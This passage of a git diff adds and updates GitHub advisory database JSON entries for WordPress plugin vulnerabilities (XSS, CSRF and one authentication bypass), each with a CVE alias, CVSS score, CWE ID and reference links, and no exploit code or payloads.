"https://www.wordfence.com/threat-intel/vulnerabilities/id/ea9e5e5d-a7fc-4159-a2ae-610bee76f818?source=cve" + }, + { + "type": "WEB", + "url": "http://localhost:1337/wp-content/plugins/wp-directorybox-manager/elements/login/cs-social-login/cs-social-login.php#L43" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-288" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-02-13T13:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/02/GHSA-rx48-9x9v-rpp3/GHSA-rx48-9x9v-rpp3.json b/advisories/unreviewed/2025/02/GHSA-rx48-9x9v-rpp3/GHSA-rx48-9x9v-rpp3.json index 288111069bf..7cc8f5594ce 100644 --- a/advisories/unreviewed/2025/02/GHSA-rx48-9x9v-rpp3/GHSA-rx48-9x9v-rpp3.json +++ b/advisories/unreviewed/2025/02/GHSA-rx48-9x9v-rpp3/GHSA-rx48-9x9v-rpp3.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-rx48-9x9v-rpp3", - "modified": "2025-02-13T06:31:43Z", + "modified": "2025-02-13T15:31:25Z", "published": "2025-02-13T06:31:43Z", "aliases": [ "CVE-2024-13120" ], "details": "The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content WordPress plugin before 4.15.20 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-02-13T06:15:20Z" diff --git a/advisories/unreviewed/2025/02/GHSA-v8r3-4779-pmvj/GHSA-v8r3-4779-pmvj.json b/advisories/unreviewed/2025/02/GHSA-v8r3-4779-pmvj/GHSA-v8r3-4779-pmvj.json new file mode 100644 index 00000000000..1398c70c774 --- /dev/null +++ b/advisories/unreviewed/2025/02/GHSA-v8r3-4779-pmvj/GHSA-v8r3-4779-pmvj.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v8r3-4779-pmvj", + "modified": "2025-02-13T15:31:26Z", + "published": "2025-02-13T15:31:26Z", + "aliases": [ + "CVE-2025-26567" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in farjana55 Font Awesome WP allows DOM-Based XSS. This issue affects Font Awesome WP: from n/a through 1.0.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26567" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/wordpress/plugin/font-awesome-wp/vulnerability/wordpress-font-awesome-wp-plugin-1-0-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-02-13T14:16:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/02/GHSA-vchj-x4x4-78r5/GHSA-vchj-x4x4-78r5.json b/advisories/unreviewed/2025/02/GHSA-vchj-x4x4-78r5/GHSA-vchj-x4x4-78r5.json new file mode 100644 index 00000000000..777e3893947 --- /dev/null +++ b/advisories/unreviewed/2025/02/GHSA-vchj-x4x4-78r5/GHSA-vchj-x4x4-78r5.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vchj-x4x4-78r5", + "modified": "2025-02-13T15:31:26Z", + "published": "2025-02-13T15:31:26Z", + "aliases": [ + "CVE-2025-26561" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in elfsight Elfsight Yottie Lite allows Stored XSS. This issue affects Elfsight Yottie Lite: from n/a through 1.3.3.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26561" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/wordpress/plugin/yottie-lite/vulnerability/wordpress-elfsight-yottie-lite-plugin-1-3-3-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-02-13T14:16:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/02/GHSA-vm5m-fjfx-3rjq/GHSA-vm5m-fjfx-3rjq.json b/advisories/unreviewed/2025/02/GHSA-vm5m-fjfx-3rjq/GHSA-vm5m-fjfx-3rjq.json new file mode 100644 index 00000000000..c1eaabaa9a9 --- /dev/null +++ b/advisories/unreviewed/2025/02/GHSA-vm5m-fjfx-3rjq/GHSA-vm5m-fjfx-3rjq.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vm5m-fjfx-3rjq", + "modified": "2025-02-13T15:31:27Z", + "published": "2025-02-13T15:31:27Z", + "aliases": [ + "CVE-2025-26574" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Moch Amir Google Drive WP Media allows Stored XSS. This issue affects Google Drive WP Media: from n/a through 2.4.4.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26574" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/wordpress/plugin/google-drive-wp-media/vulnerability/wordpress-google-drive-wp-media-plugin-2-4-4-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-02-13T14:16:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/02/GHSA-vmr5-vfmw-52fh/GHSA-vmr5-vfmw-52fh.json b/advisories/unreviewed/2025/02/GHSA-vmr5-vfmw-52fh/GHSA-vmr5-vfmw-52fh.json new file mode 100644 index 00000000000..4128f470822 --- /dev/null +++ b/advisories/unreviewed/2025/02/GHSA-vmr5-vfmw-52fh/GHSA-vmr5-vfmw-52fh.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vmr5-vfmw-52fh", + "modified": "2025-02-13T15:31:27Z", + "published": "2025-02-13T15:31:27Z", + "aliases": [ + "CVE-2025-26578" + ], + "details": "Cross-Site Request Forgery (CSRF) vulnerability in mathieuhays Simple Documentation allows Stored XSS. This issue affects Simple Documentation: from n/a through 1.2.8.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26578" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/wordpress/plugin/client-documentation/vulnerability/wordpress-simple-documentation-plugin-1-2-8-csrf-to-stored-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-02-13T14:16:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/02/GHSA-wcq9-m55m-xc6c/GHSA-wcq9-m55m-xc6c.json b/advisories/unreviewed/2025/02/GHSA-wcq9-m55m-xc6c/GHSA-wcq9-m55m-xc6c.json new file mode 100644 index 00000000000..e1b03472898 --- /dev/null +++ b/advisories/unreviewed/2025/02/GHSA-wcq9-m55m-xc6c/GHSA-wcq9-m55m-xc6c.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wcq9-m55m-xc6c", + "modified": "2025-02-13T15:31:27Z", + "published": "2025-02-13T15:31:27Z", + "aliases": [ + "CVE-2025-26577" + ], + "details": "Cross-Site Request Forgery (CSRF) vulnerability in daxiawp DX-auto-publish allows Stored XSS. This issue affects DX-auto-publish: from n/a through 1.2.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26577" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/wordpress/plugin/dx-auto-publish/vulnerability/wordpress-dx-auto-publish-plugin-1-2-csrf-to-stored-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-02-13T14:16:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/02/GHSA-wxhj-h7r3-73w2/GHSA-wxhj-h7r3-73w2.json b/advisories/unreviewed/2025/02/GHSA-wxhj-h7r3-73w2/GHSA-wxhj-h7r3-73w2.json new file mode 100644 index 00000000000..d747fe386a9 --- /dev/null +++ b/advisories/unreviewed/2025/02/GHSA-wxhj-h7r3-73w2/GHSA-wxhj-h7r3-73w2.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wxhj-h7r3-73w2", + "modified": "2025-02-13T15:31:27Z", + "published": "2025-02-13T15:31:27Z", + "aliases": [ + "CVE-2025-26571" + ], + "details": "Cross-Site Request Forgery (CSRF) vulnerability in wibiya Wibiya Toolbar allows Cross Site Request Forgery. This issue affects Wibiya Toolbar: from n/a through 2.0.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26571" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/wordpress/plugin/wibiya/vulnerability/wordpress-wibiya-toolbar-plugin-2-0-csrf-to-stored-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-02-13T14:16:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/02/GHSA-xpqx-4wj8-ww45/GHSA-xpqx-4wj8-ww45.json b/advisories/unreviewed/2025/02/GHSA-xpqx-4wj8-ww45/GHSA-xpqx-4wj8-ww45.json new file mode 100644 index 00000000000..1825a5e4281 --- /dev/null +++ b/advisories/unreviewed/2025/02/GHSA-xpqx-4wj8-ww45/GHSA-xpqx-4wj8-ww45.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xpqx-4wj8-ww45", + "modified": "2025-02-13T15:31:26Z", + "published": "2025-02-13T15:31:26Z", + "aliases": [ + "CVE-2025-26558" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in mkkmail Aparat Responsive allows DOM-Based XSS. This issue affects Aparat Responsive: from n/a through 1.3.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26558" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/wordpress/plugin/aparat-responsive/vulnerability/wordpress-aparat-responsive-plugin-1-3-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-02-13T14:16:22Z" + } +} \ No newline at end of file